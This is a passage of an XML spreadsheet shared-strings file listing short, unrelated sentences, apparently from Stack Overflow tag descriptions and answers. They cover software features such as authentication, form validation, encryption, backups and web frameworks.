    <t>I would recommend to use some pre-existing authentication framework, depending on the programming language you will use to implement your application.</t>
  </si>
  <si>
    <t>makecert.exe is a command line X.509 digital certificate creation tool included with Microsoft Visual Studio.</t>
  </si>
  <si>
    <t>django-validation refers to form and field validation tools provided by Django out of the box</t>
  </si>
  <si>
    <t>full disk encryption feature included with select editions of Windows Vista and later</t>
  </si>
  <si>
    <t>PreEmptive Protection - Dotfuscator CE is embedded into Visual Studio 2003-2017+ and subject to Microsofts regression tests, code audits and security reviews.</t>
  </si>
  <si>
    <t>Yii comes with rich features: MVC, DAO/ActiveRecord, I18N/L10N, caching, authentication and role-based access control, scaffolding, testing, etc.</t>
  </si>
  <si>
    <t>It has following layers:
Accelerate Framework
Core Bluetooth Framework
External Accessory Framework
Generic Security Services Framework
Security Framework</t>
  </si>
  <si>
    <t>Its portfolio includes solutions for managing Security &amp; Compliance, Identity &amp; Access, and Performance &amp; Availability.</t>
  </si>
  <si>
    <t>Corretto comes with long-term support that will include performance enhancements and security fixes.</t>
  </si>
  <si>
    <t>Embedding has drawbacks:
The embedded component may have security or stability flaws that are not immediately discernible to the developer.</t>
  </si>
  <si>
    <t>The main Bluetooth 5 features that will be supported are:-
2MPHY support
Advertising Extensions
Extended Scanning and Connection
You can find more information about this here:-
https://developer.apple.com/videos/play/wwdc2019/901
If you want a device for testing a Bluetooth 5 device, there are a few Android devices that already have Bluetooth 5 features.</t>
  </si>
  <si>
    <t>Audit AD LDS changes
With this feature, you can set up AD LDS auditing with a new audit subcategory to log old and new values when changes are made to objects and their attributes.</t>
  </si>
  <si>
    <t>Dubbo offers three key functionalities, which include interface based remote call, fault tolerance &amp; load balancing, and automatic service registration &amp; discovery.</t>
  </si>
  <si>
    <t>It can use various existing IPMI drivers, support Windows natively, configure the IPMI LAN in a single command, decode IPMI events, events not recognized still return data, SEL management is automated via checksel, automation of watchdog management and easy soft-reboots.</t>
  </si>
  <si>
    <t>Tokenfield for Bootstrap is a plugin that makes it easy to add tagging or tokenizing features (like tags on SO) to a website.</t>
  </si>
  <si>
    <t>Microsoft WCF RIA services simplifies the traditional n-tier application pattern providing support for validation, authentication and custom application logic.</t>
  </si>
  <si>
    <t>Pluggable authentication modules, a flexible framework for configuring authentication, most commonly the login component of Linux systems, but used in other components and operating systems.</t>
  </si>
  <si>
    <t>The minimal validation requirements, used in Django's admin and in automatically-generated forms.</t>
  </si>
  <si>
    <t>Apache ManifoldCF also defines a security model for target repositories that permits them to enforce source-repository security policies.</t>
  </si>
  <si>
    <t>This can allow for a number of powerful features, including relatively cheap order-independent transparency.</t>
  </si>
  <si>
    <t>It is reliable since transactions are secured on disk, and it supports replication and full checkpoint recovery.</t>
  </si>
  <si>
    <t>Other changes include improvements to the notification system which allow notifications to be accessed from the lockscreen, and to be displayed within other apps as banners across the top of the screen.</t>
  </si>
  <si>
    <t>From the Java EE 6 specification:
All Java EE profiles share a set of common features, such as naming and resource injection, packaging rules, security requirements, etc.</t>
  </si>
  <si>
    <t>These managers provide support for the
  authentication and key agreement aspects of the cipher suites
  supported by the context.</t>
  </si>
  <si>
    <t>nsoftware is a firm that creates professional tools and components for Internet Communications, Security, and Business Integration.</t>
  </si>
  <si>
    <t>Fluent (vapor/fluent) is a type-safe, fast, and easy-to-use ORM framework built for Swift.</t>
  </si>
  <si>
    <t>It was designed as a compromise between the strong-copyleft GNU General Public License or GPL and permissive licenses such as the BSD licenses and the MIT License.</t>
  </si>
  <si>
    <t>In addition to its use in the development cycle, a sufficiently rich logging package can also be viewed as an auditing tool.</t>
  </si>
  <si>
    <t>Business Intelligence Development Studio (BIDS) is a special version of Visual Studio that is used to develop projects for SSIS, SSAS, and SSRS.</t>
  </si>
  <si>
    <t>It will be nice to have a rule condition also on the non-telemetry data, however in this current version of the Azure IoT Central is only way to obtain a full device message is using a Continuous Data Export.</t>
  </si>
  <si>
    <t>Capabilities
Simple Data Access - Easy and secure access your most essential on-premises and cloud data sources with a powerful visual interface, ensuring you have the right data for your analytics project.</t>
  </si>
  <si>
    <t>...supports advanced database features such as prepared statements, bound variables, stored procedures, savepoints, two-phase commit, transaction isolation, master/slave configurations, and database sharding.</t>
  </si>
  <si>
    <t>Enhance security and control using integrated management and administrative tools.</t>
  </si>
  <si>
    <t>The Automatic Identification System (AIS) is an automatic tracking system used on ships and by vessel traffic services (VTS) for identifying and locating vessels by electronically exchanging data with other nearby ships, AIS base stations, and satellites.</t>
  </si>
  <si>
    <t>It consists of an MDEX Engine, Development/Forge tools and exposes URL-based token search parameters, supported by a Java client API.</t>
  </si>
  <si>
    <t>Directory Information Trees accessed by the LDAP protocol are used in authentication and authorization applications, configuration storage, profile storage, public-key infrastructure and other applications requiring:
speed of access
a small, light-weight protocol
A simple programming model
easily configured replication, redundancy, and failover
Questions that are specific to Active Directory should not be tagged with the LDAP tag unless the question is specifically related to the LDAP protocol or the Directory Information Model.</t>
  </si>
  <si>
    <t>What is new:
Logging Improvements
Single Server Task Scheduling
Dynamic Rate Limiting
Broadcast Channel Classes
Model Serialization Improvements
Argon2 Password Hashing
Collision (Pretty CLI Output)
Bootstrap 4
Resources:
Release notes about 5.6
Upgrade guide for 5.6</t>
  </si>
  <si>
    <t>The following is a basic list of some of the software features:
Scheduling
Accounting
3D Charting
Perio Charting
Patient tracking
Insurance claim tracking
Lab case tracking
Document center to scan and store paperwork, images, and other items
Letter merge with Microsoft Word
Custom report lists
Payment/fee schedules
Digital signature capture for patient consent forms.</t>
  </si>
  <si>
    <t>It supports a deep security model as well as the ability to use a CRON-based scheduling system.</t>
  </si>
  <si>
    <t>A new generation of blockchain application development platform based on multi-chain architecture.</t>
  </si>
  <si>
    <t>Based on this notifications, versioning and device twin metadata, the state can be transited from one end to other one in the reliable manner.</t>
  </si>
  <si>
    <t>Django operator, which returns a queryset that follows and caches foreign key relationships, in order to avoid hitting the database in future calls that require use of foreign keys.</t>
  </si>
  <si>
    <t>Powerful out of the box with RESTful routes, plugins, Perl-ish templates, session management, signed cookies, testing framework, static file server, I18N, first class unicode support and much more for you to discover.</t>
  </si>
  <si>
    <t>Features
Single command server setup
Single command deployment
Environmental Variables management
Support for settings.json
Password or Private Key (pem) based server authentication
Access, logs from the terminal (supports log tailing)
GitHub Page: https://github.com/arunoda/meteor-up</t>
  </si>
  <si>
    <t>Tiki includes all the basic features common to most CMSs such as the ability to register and maintain individual user accounts within a flexible and rich permission / privilege system, create and manage menus, RSS-feeds, customize page layout, perform logging, and administer the system.</t>
  </si>
  <si>
    <t>Summary of new/improved functionality
Improved reliability
Improved user experience
Applets launch in the background
Built-in JNLP (Java Web Start) support
Per-applet command line arguments
Heap size, Java 2D API acceleration options
Improved Java/JavaScript programming language integration
Improved Windows Vista support
Signed applets now work correctly in Protected Mode Internet Explorer
See also
Next-Generation Java Plug-In Technology Introduced in Java SE 6 update 10
Article: Next Generation in Applet Java Plug-in Technology
What is next-generation Java Plug-in and how can I switch between the old Java plug-in and new Java plug-in?</t>
  </si>
  <si>
    <t>CxSuite comes with an extensive list of hundreds of preconfigured queries for known security vulnerabilities for each programming language.</t>
  </si>
  <si>
    <t>Think of CloudBoost as Parse + Firebase + Algolia + Iron.io all combined into one :
Data-Storage / JSON Storage / BLOB Storage
100% data ownership
Realtime
Search
Cache
Queues
More - ACL's, User Authentication, Server-less apps and more.</t>
  </si>
  <si>
    <t>Apache features configurable error messages, dbms-based authentication databases, and content negotiation.</t>
  </si>
  <si>
    <t>It features a lightweight, open architecture that implements several federation and API security standards, namely: SAML, OAuth, WS-Federation, WS-Trust, SCIM and OpenID Connect.</t>
  </si>
  <si>
    <t>Newspeak
is message based, late bound (like Self)
has classes (like Smalltalk, unlike Self)
supports nested classes (like BETA)
With this design, features as modules, mixins, and object capability security fall out automatically.</t>
  </si>
  <si>
    <t>Web scraping methods include 3rd-party applications, development of custom software, or even manual data collection in a standardized way.</t>
  </si>
  <si>
    <t>Coded UI tests are automated User Interface tests that can be created with Visual Studio to test different kinds of user interfaces, allowing for verification of user application functionality.</t>
  </si>
  <si>
    <t>The framework will create proxy classes that are used on client-side JavaScript to invoke methods on the web server with full data type support working on all common web browsers including mobile devices.</t>
  </si>
  <si>
    <t>It includes:
Lucid ORM
Database Migrations
Authentication System
OAuth
Mailing System
Data Validator
Learn more on the website and check out the organization on Github.</t>
  </si>
  <si>
    <t>As of v8.0, IBM MQ Advanced Message Security and Managed File Transfer are available on Distributed and z/OS platforms integrated into the main product and enabled via license entitlement.</t>
  </si>
  <si>
    <t>Tor is free to download and an open network that helps you defend against location snooping and browsing analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security.</t>
  </si>
  <si>
    <t>See the AWS documentation under Server Authentication (https://docs.aws.amazon.com/iot/latest/developerguide/managing-device-certs.html)
Any help on understanding ways that the list of root certificates can be reduced - such as elemination based on ECC-based validation vs RSA-based validation - would be helpful.</t>
  </si>
  <si>
    <t>Use database-cluster for questions related to running a group of databases as a cluster, which helps prevent the existence of a single point of failure in case a database server fails or is compromised.</t>
  </si>
  <si>
    <t>Using some VM based programming languages for period of time usually leads to realising that some parts of the code aren't translated into bytecode efficiently, might be optimized for the specific VM even more or we just need some functionality which isn't implemented into standard bytecode compiler/interpreter/etc, like:
bytecode encryption
bytecode linkage
etc.</t>
  </si>
  <si>
    <t>CKEditor solutions comply with industry-accepted accessibility standards and are supported in a large variety of environments, including mobile and legacy browsers.</t>
  </si>
  <si>
    <t>Supports alert generation, decoding video, automatic deletion of historic data, easy picture browsing via key files.</t>
  </si>
  <si>
    <t>The Google Custom Search API enables licensed API access, via REST calls, to the Google search engine.</t>
  </si>
  <si>
    <t>Some of the default WordPress user roles &amp; capabilities are as below,
Super Admin  somebody with access to the site network administration features and all other features.</t>
  </si>
  <si>
    <t>Description
A JSON Schema validation implementation in pure Java, which aims for JSON correctness and performance, in that order json-schema-validator
The implementation has complete validation support for draft v4.</t>
  </si>
  <si>
    <t>Dirty Forms will alert a user when they attempt to leave a page without submitting a form they have entered data into.</t>
  </si>
  <si>
    <t>Microservices, authorization, SQL and noSQL databases, traffic splitting, logging, search, versioning, security scanning, memcache, and content delivery networks are all supported natively.</t>
  </si>
  <si>
    <t>It also handles validating the form element upon submission and reports back to the user any errors that it may have encountered while validating the form.</t>
  </si>
  <si>
    <t>What I would recommend because it's more secure and easier to manage is to submit a form to your webserver using PHP or Python or some other scripting language.</t>
  </si>
  <si>
    <t>The XWork validation subsystem of the Struts2 framework that enables the application of input validation rules to Actions before they are executed.</t>
  </si>
  <si>
    <t>Use this tag if your question relates to the Yii2-validation-system, no matter if your validation is within a model or as standalaone validator-instances.</t>
  </si>
  <si>
    <t>Examples of such commands include deadlock detection, generational garbage collection commands, and more powerful breakpoint commands.</t>
  </si>
  <si>
    <t>HTML5 Validation allows developers to easily perform client-side validation of user input on forms.</t>
  </si>
  <si>
    <t>Duplicity is a versatile backup program that encrypts backups using gpg and allows storage on various remote systems using a huge variety of backends such as SFTP, S3, WebDAV
Homepage of Duplicity
Manpage of Duplicity</t>
  </si>
  <si>
    <t>Percona XtraBackup is an open-source MySQL hot backup software that performs non-blocking backups for InnoDB and XtraDB databases.</t>
  </si>
  <si>
    <t>Tokenfield for Bootstrap is a plugin that makes it easy to add tagging or tokenizing features (like tags on stackoverflow) to a website.</t>
  </si>
  <si>
    <t>Creating a CEK is required before any column in the database can be encrypted using the Always Encrypted (Database Engine) feature.</t>
  </si>
  <si>
    <t>Therefore, data validation should start with business process definition and set of business rules within this process.</t>
  </si>
  <si>
    <t>Living on the edge
There are a set of interesting links on the symfony blog about what's new in this version:
Console: Autocomplete on the command line;
Console: Progress bars for long running tasks;
Console: Hiding passwords given from the CLI;
Console: Asking the user to choose from a list of choices;
Finder: Filtering by path;
Finder: Glob Support for the in() method;
Finder: Speedup on some Platforms;
HttpKernel: A new sub-framework to manage resource fragments;
HttpKernel: Nice fatal errors display;
HttpKernel: The logging of deprecated calls;
Process: Getting incremental Output from a Process;
Process: Restarting a Process;
Process: Getting the Status of a running Process;
Routing: URL host support in the Routing;
Routing: Schema-relative and Path-relative URLs;
Security: interesting security utilities;
Validators: Payment related validators;
FrameworkBundle: some nice performance improvement for functional tests;
FrameworkBundle: caching for static pages.</t>
  </si>
  <si>
    <t>Apache Qpid implements the latest AMQP specification, providing
  transaction management, queuing, distribution, security, management,
  clustering, federation and heterogeneous multi-platform support and a
  lot more.</t>
  </si>
  <si>
    <t>Silhouette is a framework agnostic authentication library for Scala that supports several authentication methods, including OAuth1, OAuth2, OpenID, CAS, Credentials, Basic Authentication, Two Factor Authentication or custom authentication schemes.</t>
  </si>
  <si>
    <t>Rhino Licensing can also include custom data in the license file so you have the ability to easily store your customer information in the license file.</t>
  </si>
  <si>
    <t>The successor to Microsoft's popular Windows XP (windows-xp), Vista incorporates new features such as the Windows Aero desktop UI, improved home network support, Windows Search, and improved security features like the User Access Control (UAC) (uac).</t>
  </si>
  <si>
    <t>IBM Worklight Device Runtime Components offer runtime client application program interfaces (API) designed to enhance security, governance and usability.</t>
  </si>
  <si>
    <t>Free GNU Linux Books
Advanced Linux Programming
GNU Autoconf, Automake and Libtool
GTK+/Gnome Application Development
The Linux Development Platform (PDF)
Linux Device Drivers by Jonathan Corbet, Alessandro Rubini, and Greg Kroah-Hartman
The Linux Kernel Module Programming Guide
Secure Programming for Linux and Unix
GNU Linux distributions
Debian
Fedora
OpenSUSE
Ubuntu
Mandriva
Linux Mint
Slax
CentOS
Gentoo</t>
  </si>
  <si>
    <t>To start with I wanted to create a  custom tag, that handles showing of label (and later some basic validation rules) and then specific components.</t>
  </si>
  <si>
    <t>Acegi Security is a powerful and flexible security solution for Java enterprise applications built using the Spring framework</t>
  </si>
  <si>
    <t>Two-factor authentication (TFA, T-FA or 2FA) is an approach to authentication which requires the presentation of two or more of the three authentication factors: a knowledge factor ("something the user knows"), a possession factor ("something the user has"), and an inherence factor ("something the user is").</t>
  </si>
  <si>
    <t>Benefits of HDL
The major benefit of the language is fast design and better verification.</t>
  </si>
  <si>
    <t>To include this functionality when creating a validation class, simply extend Zend_Validate_Abstract.</t>
  </si>
  <si>
    <t>There are a variety of methods and helpers to assist you in organizing your authorization logic.</t>
  </si>
  <si>
    <t>Kuzzle is a high performance open source, on premise and cloud agnostic backend for IoT and modern apps featuring CRUD, real-time notifications, authentication, geofencing and a full featured cluster mode.</t>
  </si>
  <si>
    <t>Export with JavaScript Obfuscation  Extension Builder includes tools to help you package your finished extension in the ZXP format, so that you can offer it in Adobe Exchange, and users can install and manage it with Extension Manager.</t>
  </si>
  <si>
    <t>Flask-JWT-Extended is an opinionated Flask extension that adds support for using JSON Web Tokens (JWT) to protect views.</t>
  </si>
  <si>
    <t>Actian Zen offers full security, encryption, management and monitoring tools, plus a host of other features.</t>
  </si>
  <si>
    <t>The authentication pipeline can be customized by implementing your own rules, in plain Javascript, that will be executed every time a user authenticates to an application.</t>
  </si>
  <si>
    <t>2- Standard: Find rich programming capabilities, security innovations, and fast performance for applications and data marts.</t>
  </si>
  <si>
    <t>Mirth is based on the open source Mule ESB engine to provide speed, stability and security in a flexible environment.</t>
  </si>
  <si>
    <t>PHP 5.5 (Currently Alpha 1) comes with new features such as (incomplete list) :
    support for Generators,
    a new password hashing API,
    support for finally in try/catch blocks
    support for list() in foreach,
    constant array/string dereferencing,
    ext/intl improvement.</t>
  </si>
  <si>
    <t>Firebase is a powerful platform for building iOS, Android, and web-based apps, offering real-time data storage and synchronization, user authentication, and more.</t>
  </si>
  <si>
    <t>The Nexus 6P along with the Nexus 5X serve as launch devices for Android 6.0 "Marshmallow", which introduces a refreshed interface, performance and battery life improvements, Google Now on Tap integration, a fine-grained permission model, fingerprint verification, and other new features.</t>
  </si>
  <si>
    <t>x86 Instruction Reference including undocumented insns, from an old version of the NASM manual, including descriptions, and which generation (8086, 186, 286, ...) introduced each form of each insn.</t>
  </si>
  <si>
    <t>Typical uses for stored procedures include data validation (integrated into the database) or access control mechanisms.</t>
  </si>
  <si>
    <t>Features include:
Users can be stored via Doctrine ORM, MongoDB/CouchDB ODM or Propel
Registration support, with an optional confirmation email
Password reset support
Unit tested</t>
  </si>
  <si>
    <t>However, the SDK from Espressif switched to mbedTLS a little while back, and mbedTLS Supported Cipher Suites show that it includes support for those ciphers.</t>
  </si>
  <si>
    <t>Integrated validation - RadUpload can automatically validate uploaded files for file extension, MIME type, and file size.</t>
  </si>
  <si>
    <t>BitLocker (codenamed Cornerstone and formerly known as Secure Startup) is a full disk encryption feature included with select editions of Windows Vista and later.</t>
  </si>
  <si>
    <t>Audit History: Delta Lake transaction log records details about every change made to data providing a full audit trail of the changes.</t>
  </si>
  <si>
    <t>Surveyor includes support for some data entry validation including simple integer input, and others.</t>
  </si>
  <si>
    <t>It is available for numerous languages with the aim of providing web security related features missing in those languages (and its internal APIs) itself.</t>
  </si>
  <si>
    <t>Most notable changes in this version revolve around security aspects(With improved user authentication supporting OAuth, 3rd party social logins, ADFS, LDAP support, site shield.)</t>
  </si>
  <si>
    <t>In dry-validation type-safety is a first-class feature, something thats completely missing in other validation libraries, and its an important and useful feature.</t>
  </si>
  <si>
    <t>XAF's modular design facilitates a plug and play approach to common business requirements such as security and reporting.</t>
  </si>
  <si>
    <t>Golang repo
Maybe try with an official repository for golang:
they also support your architecture:
Supported architectures: md64, arm32v6, arm32v7, arm64v8,
  i386, ppc64le, s390x, windows-amd6
Maybe this is a connection/firewall issue.</t>
  </si>
  <si>
    <t>You could use JavaScript to read the form values and submit an HTTP request to a separate endpoint to store the username and password values, but HTML already supports forms.</t>
  </si>
  <si>
    <t>WAL, or write-ahead log, is a form of journalling used as part of crash-safety and atomic commit support in databases like PostgreSQL and SQLite.</t>
  </si>
  <si>
    <t>It can manage multiple contact forms, is customizable, supports Ajax-powered submitting, CAPTCHA, Akismet spam filtering and more.</t>
  </si>
  <si>
    <t>This tag is about any questions regarding its installation, security or issues with the development of new plugins, backends or storage plugins.</t>
  </si>
  <si>
    <t>SQLCipher has a small footprint and great performance so its ideal for protecting embedded application databases and is well suited for mobile development.</t>
  </si>
  <si>
    <t>Depending on the browser, the Enter key may only cause a form submission if the form has exactly one text field, or only when there is a submit button present.</t>
  </si>
  <si>
    <t>HyperDex's key features -- namely its rich API, strong consistency, and fault tolerance -- provide strong guarantees to applications that are not matched by other NoSQL systems.</t>
  </si>
  <si>
    <t>LiveValidation is a small open source JavaScript library for making client-side validation quick, easy, and powerful.</t>
  </si>
  <si>
    <t>Zend_Http_Client supports most simple features expected from an HTTP client, as well as some more complex features such as HTTP authentication and file uploads.</t>
  </si>
  <si>
    <t>Main Features:
Compatible with 100+ OAuth provider (Facebook, Google, etc)
Web &amp; Mobile easy integration 
fluent API</t>
  </si>
  <si>
    <t>Writing a spec should enable automatic:
Validation
Error reporting
Destructuring
Instrumentation
Test-data generation
Generative test generation
See http://clojure.org/about/spec</t>
  </si>
  <si>
    <t>Validating AMP pages
There are three ways to validate an AMP page:
Add  to the URL, for example http://localhost:8000/released.amp.html#development=1, then check the browser console for validation errors.</t>
  </si>
  <si>
    <t>Log Analytics
Azure Automation
Azure Backup
Azure Site Recovery  
Useful Links:
OMS Overview
OMS Architecture
Available Solutions</t>
  </si>
  <si>
    <t>Features
100% Pure Java - works on any Java Platform version 5 or later
Android platform and Google App Engine ready
Zero dependency: No additional jars required
Built-in OAuth support
Out-of-the-box gzip support
100% Twitter API 1.1 compatible</t>
  </si>
  <si>
    <t>The 7z format is a compressed archive file format that supports several different data compression, encryption and pre-processing algorithms.</t>
  </si>
  <si>
    <t>jQuery Cookie is a simple, lightweight jQuery plugin for reading, writing and deleting cookies.</t>
  </si>
  <si>
    <t>An Elasticsearch cluster benefits from properly implemented security with Shield in the following ways:
Role-based access control at the index level and LDAP authentication integration to prevent unauthorized access
Encryption to preserve the integrity of your data, keeping confidential data confidential.</t>
  </si>
  <si>
    <t>Because of the inherent distributed nature of
  this interface, all Alfresco content repositories within the
  enterprise can resemble one logical collection of inter-related
  documents (like the web), letting you apply web technologies such as
  caching, authentication, proxies, and negotiation to your repository
  resources.</t>
  </si>
  <si>
    <t>ASP.NET MVC validation is a method for validating your models with property attributes.</t>
  </si>
  <si>
    <t>The HTML keygen element exists to facilitate generation of key material, and submission of the public key as part of an HTML form.</t>
  </si>
  <si>
    <t>Some of these elements include:
 Computer name[1]
 Security Identifier (SID)
 Driver Cache
Sysprep seeks to solve these issues by allowing for the generation of new computer names, unique SIDs, and custom driver cache databases during the Sysprep process.</t>
  </si>
  <si>
    <t>The ABAddressBook opaque type provides a programming interface to the Address Book  a centralized database used by multiple applications to store personal information about people.</t>
  </si>
  <si>
    <t>With its modular, extensible, and customizable capabilities, WSO2 Internet of Things Server (IoT Server) offers a complete, secure, open source, enterprise-grade IoT device management solution.</t>
  </si>
  <si>
    <t>Encrypted Core Data SQLite is a facility that provides encrypted
storage for persistent core data.</t>
  </si>
  <si>
    <t>At a glance this looks promising to me as it claims to provide a library directly interfaces Arduino and esp8266 microcontrollers to DSC PowerSeries security systems for integration with home automation, notifications on system events, and usage as a virtual keypad.</t>
  </si>
  <si>
    <t>The Enterprise Library Validation Application Block provides a library of classes, called validators, that supplies the code for validating .NET Framework data types.</t>
  </si>
  <si>
    <t>For example, SDL has full support for network transparency using X.</t>
  </si>
  <si>
    <t>The jQuery validation plugin is a plugin by Jrn Zaefferer for jQuery.</t>
  </si>
  <si>
    <t>Automatic Auditing for application using "LINQ to SQL" or "Entity Framework"</t>
  </si>
  <si>
    <t>The jQuery Validate plugin is a jQuery plugin by Jrn Zaefferer.</t>
  </si>
  <si>
    <t>Struts Framework provides the functionality to validate the form data.</t>
  </si>
  <si>
    <t>Aurelia Validation is a validation plugin for aurelia.</t>
  </si>
  <si>
    <t>When an instance of this class is validated by a JSR-303 Validator, these constraints will be enforced.</t>
  </si>
  <si>
    <t>The jQuery Validate plugin is a jquery plugin by Jrn Zaefferer.</t>
  </si>
  <si>
    <t>It can be overridden to provide custom validation logic.</t>
  </si>
  <si>
    <t>Validation metadata is provided via annotations.</t>
  </si>
  <si>
    <t>reCAPTCHA uses an advanced risk analysis engine and adaptive CAPTCHAs to keep automated software from engaging in abusive activities on your site.</t>
  </si>
  <si>
    <t>But would like to implement the creation of IoT device logic programmatically, for which, I found that this could be done though Azure Rest API:
https://docs.microsoft.com/en-us/rest/api/iothub/service/createorupdatedevice
One of the requirement is authentication through SAS.</t>
  </si>
  <si>
    <t>Java Cryptographic Extension : a pluggable cryptography framework where various providers can bring the desired functionality</t>
  </si>
  <si>
    <t>Google Vault is the eDiscovery and compliance solution for G Suite, allowing customers to retain, hold, search, and export their data.</t>
  </si>
  <si>
    <t>Support for path-based authorization, including parsing and honoring Subversion authz configuration files.</t>
  </si>
  <si>
    <t>The definition, manipulation and integrity rules of relational databases are based on relational operations equivalent to or similar to the Relational Algebra and Calculus.</t>
  </si>
  <si>
    <t>Its features include: selective restore and backup, secure and unsecure backup and restore as well as the ability to survive node crashes in a replica set.</t>
  </si>
  <si>
    <t>Major Features
Yarn Support
Webpack
Encrypted secrets
See Ruby on Rails 5.1 Release Notes for more information.</t>
  </si>
  <si>
    <t>It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections</t>
  </si>
  <si>
    <t>As soon as i include the capability
in the Package-Capabilities-section i get a Validation error stating the my app manifest must be valid as per scheme.</t>
  </si>
  <si>
    <t>To accomplish this, you need to query the devices using  to find some unique identifying information, then create a file /etc/udev/rules.d/99-usbserial.rules that will tell the Pi how to map the device.</t>
  </si>
  <si>
    <t>Trusted Web Activities are a new way to integrate your web-app content such as your PWA with your Android app using a protocol based on Custom Tabs.</t>
  </si>
  <si>
    <t>Since downtime is more expensive at scale high-availability is built-in from the beginning; as are security and multi-tenancy to support many users on the larger clusters.</t>
  </si>
  <si>
    <t>Any data written to the database must be valid according to all defined rules, including constraints, cascades, triggers, and any combination thereof.</t>
  </si>
  <si>
    <t>Dotfuscators purpose is to provide comprehensive .NET application protection that fits into your security development lifecycle.</t>
  </si>
  <si>
    <t>It is one of a number of validation options, including Data Annotations.</t>
  </si>
  <si>
    <t>Sockets, namely Berkeley Sockets is an abstraction for powerful computers that support numerous protocols on several OSI Layers (IEEE 802 protocols, IP, ICMP, TCP, UDP etc).</t>
  </si>
  <si>
    <t>In addition to Alexander,
add in project build.gradle: in repositories :
maven { url 'https://maven.google.com'}
And think about pitfall with permissions:
they are first granted after reboot of device, not after installing the app</t>
  </si>
  <si>
    <t>Access is controlled, and it is possible to lock down access and restrict features so domain experts (non programmers) can view and edit rules without being exposed to all the features at once.</t>
  </si>
  <si>
    <t>The context information is also
  stored in the sys.dm_exec_requests, sys.dm_exec_sessions, and
  sys.sysprocesses system views, but querying the views directly
  requires SELECT and VIEW SERVER STATE permissions.</t>
  </si>
  <si>
    <t>Through workflows that can be attached to any entity, these embedded forms allow your business the ability to collect valuable customer data that records directly to OroCRM.</t>
  </si>
  <si>
    <t>Facebook4J is featuring:
100% Pure Java - works on any Java Platform version 5 or later
Zero dependency : No additional jars required
Built-in OAuth support
Home Page of Facebook4j
API Support Matrix provided by Facebook4j</t>
  </si>
  <si>
    <t>It uses routines, often called validation rules, validation constraints or check routines, that check for correctness, meaningfulness, and security of data that are input to the system.</t>
  </si>
  <si>
    <t>Fine-grained control of traffic behavior with rich routing rules, retries, failovers, and fault injection.</t>
  </si>
  <si>
    <t>Here's a simple example of a login form:
&lt;form method="POST" action="some_action&gt;
    &lt;fieldset&gt;
        &lt;legend&gt;Log In&lt;/legend&gt;
        &lt;label&gt;Username: &lt;input type="text"&gt;&lt;/label&gt;
        &lt;label&gt;Password: &lt;input type="password"&gt;&lt;/label&gt;
        &lt;input type="submit" value="Submit"&gt;
    &lt;/fieldset&gt;
&lt;/form&gt;</t>
  </si>
  <si>
    <t>Major features
The SDK exposes features such as audio and graphics, cryptography, networking, as well as device information such as accelerometer information, GPS, and user input.</t>
  </si>
  <si>
    <t>Notifications are used to communicate with users (often via e-mail) to alert them of events in the system, such as a build or release being deployed, and notifications for required approvals.</t>
  </si>
  <si>
    <t>As the ACPI technology gained wider adoption with many operating systems and processor architectures, the desire to improve the governance model of the specification has increased significantly.</t>
  </si>
  <si>
    <t>Alternatively, you can use pGina which is a already implemented CredentialProvider that can be customized using plugins written in C# or other .NET languages.</t>
  </si>
  <si>
    <t>It's a product built on top of WebSphere MQ and thus inherits reliability and security provided by WebSphere MQ.</t>
  </si>
  <si>
    <t>It can be used to trigger JavaScript to validate the form, pre-process its data, or block the submission altogether.</t>
  </si>
  <si>
    <t>By using roles, workflows, and lifecycle rules, administrators can enforce security policies across all enterprise systems.</t>
  </si>
  <si>
    <t>You may override rules() to declare validation rules that should be applied to the attributes.</t>
  </si>
  <si>
    <t>Applications written using the Enterprise JavaBeans architecture are scalable,  transactional, and multi-user secure.</t>
  </si>
  <si>
    <t>Java writes a local html page containing:
the one-time token
a form that submits the one-time token
JavaScript that submits the form on login.</t>
  </si>
  <si>
    <t>Caja uses an object-capability security model to allow for a wide range of flexible security policies, so that your website can effectively control what embedded third party code can do with user data.</t>
  </si>
  <si>
    <t>It is currently available for Python versions 2.7 or 3.2+
NLTK includes a great number of common natural language processing tools including a tokenizer, chunker, a part of speech (POS) tagger, a stemmer, a lemmatizer, and various classifiers such as Naive Bayes and Decision Trees.</t>
  </si>
  <si>
    <t>Additional Typhoeus features are:
basic authentication;
compression;
cookie processing;
SSL connection abililies;
streaming;
callbacks on a request;
request memoization;
caching;
stub out specific urls and patterns for testing.</t>
  </si>
  <si>
    <t>New features are shortcut buttons for common operations, "pinning" of the results tab, Microsoft Access Migration, MySQL Fabric Integration, Spatial View Panel to visualize spatial and geometry data, Geometry Data Viewer, Result Set Width, SQL editor tabs are properly saved, Shared Snippets, a new Run SQL Script dialog, Model Script Attachments, Client Connections management has a new "Show Details" window where more information about connections, locks, and attributes is displayed, performance columns can display sizes in KB, MB, or GB, the migration wizard can resume operations of data copying if interrupted, MySQL connection password is remembered across the MySQL Workbench session.</t>
  </si>
  <si>
    <t>Interact with the Firebase Database, to read and write JSON data and deploy security rules
Interact with Firebase Storage, to read and write files and deploy security rules
Deploy Cloud Functions for Firebase code
Emulate Cloud Functions and Cloud Firestore locally for use in development and testing.</t>
  </si>
  <si>
    <t>Any developer or non-developer can create and make available to consumers their data, their business logic, and even existing APIs, in minutes - including of course all the security and scalability thats required.</t>
  </si>
  <si>
    <t>An unmanaged resource is any resource (typically something existing outside of the application runtime, such as a file handle or database connection) which is not--and cannot be--monitored and released by the .NET runtime garbage collector.</t>
  </si>
  <si>
    <t>It provides a flexible framework for user management that aims to handle common tasks such as user registration and password retrieval.</t>
  </si>
  <si>
    <t>The availability of the reasons for validation failures may be valuable to an application for various purposes, such as providing statistics for usability analysis.</t>
  </si>
  <si>
    <t>The LoginRadius platform is a REST API-based authentication solution that handles identity creation, authentication and full management of user profiles and access.</t>
  </si>
  <si>
    <t>Oracle REST Data Services is a Java Enterprise Edition (Java EE) based data service that provides enhanced security, file caching features, and RESTful Web Services.</t>
  </si>
  <si>
    <t>TLS support is extended to support RFC 5077, "Transport Layer Security (TLS) Session Resumption without Server-Side State", which improves performance of long-running TLS-secured connections that need to reconnect due to session expiration.</t>
  </si>
  <si>
    <t>The Business Logic Processor is surrounded by Disruptors - a concurrency component that implements a network of queues that operate without needing locks.</t>
  </si>
  <si>
    <t>The Business
  Logic Processor is surrounded by Disruptors - a concurrency component
  that implements a network of queues that operate without needing
  locks.</t>
  </si>
  <si>
